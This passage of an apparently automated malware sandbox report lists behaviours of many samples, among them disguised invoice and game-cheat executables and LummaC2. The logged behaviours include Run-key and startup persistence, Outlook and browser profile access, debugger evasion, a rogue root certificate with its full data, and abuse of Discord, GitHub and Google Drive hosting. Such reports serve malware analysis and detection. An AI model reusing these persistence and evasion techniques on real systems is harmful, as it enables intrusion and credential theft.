| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\kyhjasehs.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\random.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\MsChainWinSavesNet\intosvc.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\FACTURA-09876RT567800.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\pornhub_downloader.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Google\Temp\explorer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\nothjgdwa.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\New Text Document mod.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\LukeJazz.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\Google\Temp\explorer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7ZO8A2~3\Files\PORNHU~1.EXE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\Bloxflip%20Predictor.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\4363463463464363463463463.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\cvv.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\2968224716.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\updater.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\updater.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\C1J7SVw.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TranscribeX.url | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\Bloxflip%20Predictor.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk | C:\Windows\Bloxflip Predictor.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe | C:\Users\Admin\AppData\Local\Temp\onefile_3944_133785010779390916\l4.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe | C:\Users\Admin\AppData\Local\Temp\onefile_3944_133785010779390916\l4.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\XClient.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\XClient.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TranscribeX.url | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\random.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\3EUEYgl.exe | N/A |
Loads dropped DLL
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\FACTURA-09876RT567800.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\FACTURA-09876RT567800.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\FACTURA-09876RT567800.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\o.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\updater = "\"C:\\Users\\Admin\\AppData\\Local\\updater.exe\"" | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\kyhjasehs.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\updater = "\"C:\\Users\\Admin\\AppData\\Local\\updater.exe\"" | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\kyhjasehs.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\AzVRM7c.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\My Program = "C:\\Users\\Admin\\AppData\\Local\\MyHiddenFolder\\RegAsm.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows2 = "C:\\Windows\\Bloxflip Predictor.exe" | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\Bloxflip%20Predictor.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\DHCP Service = "C:\\Program Files (x86)\\DHCP Service\\dhcpsvc.exe" | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\nano.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\nano.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | checkip.dyndns.org | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | \??\c:\Windows\System32\xqt5sk.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | N/A |
| File created | \??\c:\Windows\System32\CSC2CA6E1F3DA984E968ECE537E1EAC7E2.TMP | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\random.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\khtoawdltrha.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\3EUEYgl.exe | N/A |
Suspicious use of SetThreadContext
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Microsoft.NET\RedistList\d644733565d465 | C:\MsChainWinSavesNet\intosvc.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\AzVRM7c.exe | N/A |
| File created | C:\Program Files (x86)\DHCP Service\dhcpsvc.exe | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\nano.exe | N/A |
| File opened for modification | C:\Program Files (x86)\DHCP Service\dhcpsvc.exe | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\nano.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\7a0fd90576e088 | C:\MsChainWinSavesNet\intosvc.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\AzVRM7c.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\AzVRM7c.exe | N/A |
| File created | C:\Program Files (x86)\Google\Temp\explorer.exe | C:\MsChainWinSavesNet\intosvc.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft.NET\RedistList\w32tm.exe | C:\MsChainWinSavesNet\intosvc.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\AzVRM7c.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\o.exe | N/A |
| File opened for modification | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\o.exe | N/A |
| File created | C:\Windows\Bloxflip Predictor.exe | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\Bloxflip%20Predictor.exe | N/A |
| File opened for modification | C:\Windows\Bloxflip Predictor.exe | C:\Windows\SysWOW64\attrib.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\nothjgdwa.exe | N/A |
Access Token Manipulation: Create Process with Token
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\Dynpvoy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\W4KLQf7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\newtpp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Downloaders\4363463463464363463463463\4363463463464363463463463.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\nano.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\pornhub_downloader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\4363463463464363463463463.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\yiklfON.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Bloxflip Predictor.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\3291433011.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\khtoawdltrha.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\Bloxflip%20Predictor.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2880822053.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\FACTURA-09876RT567800.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\LummaC2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\FACTURA-09876RT567800.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\LukeJazz.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\mtbkkesfthae.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\svhosts.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\xxl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\yiklfON.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\nothjgdwa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\cvv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\437570\Ul.pif | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\Z9Pp9pM.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\C1J7SVw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\NoEscape.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zO8A2DC618\a\M5iFR20.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\sysnldcvmr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7ZO8A2~3\Files\PORNHU~1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\3084722593.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\o.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\systeminfo.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\kyhjasehs.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings | C:\MsChainWinSavesNet\intosvc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings | C:\Program Files (x86)\Google\Temp\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\updater.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\updater.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings | C:\Program Files (x86)\Google\Temp\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\cvv.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\xxl.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 | C:\Users\Admin\AppData\Local\Temp\7zO8A23EDF7\Files\xxl.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
